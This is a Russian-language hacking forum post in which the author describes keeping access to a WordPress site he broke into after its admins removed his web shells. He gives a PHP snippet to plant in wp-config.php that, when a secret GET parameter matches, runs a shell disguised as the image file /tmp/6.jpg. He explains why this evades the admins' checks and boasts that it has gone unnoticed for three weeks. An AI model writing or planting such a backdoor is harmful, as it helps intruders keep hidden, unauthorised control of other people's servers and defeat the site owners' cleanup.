Пару недель назад решил взять себя в руки, и начать учить PHP, а то паскаль не в счёт. Есть у меня один сайт, в котором я нехило накосячил по неопытности, в итоге админы посносили все шеллы, и начали регулярно проверять на наличие блох.
Первым действием я поискал на форуме, затем погуглил, прочитавши все способы понял, что ловить с них нечего. Всё в конечном итоге сводится к тому, что-бы добавить что-то в .htaccess, а мои админы это палят. Еще конечно был вариант с Cron'ом на линуксе, но это ужасно неудобно, ведь однажды админы разозлятся и пофиксят валнераблу.
И тут мне пришла идея, вроде всё просто, но это работает:
Код:
Code:
$data = $_GET['youpass'];
if ($data == "youpass")
include "/tmp/6.jpg";
Для начала, нам нужно найти какой-нибудь PHP'шник, который не будет давать никакого результат на экран. В моем случае сайт стоит на WP, и я выбрал wp-config.php. В PHP есть очень хорошая команда include, которой всё равно на расширение. Она открывает и выполняет код, т.е можно запихнуть шелл в любую папку доступную для записи с любым расширением.
Минусы: - [COLOR="rgb(255, 166, 77)"]От админов, которые умеют читать логи ничего не спасёт.[/COLOR]
Прошло 3 недели. а шелл никто не фиксит. Способ работает.Вообщем-то всё. Надеюсь мои занятия по PHP не пройдут даром)
|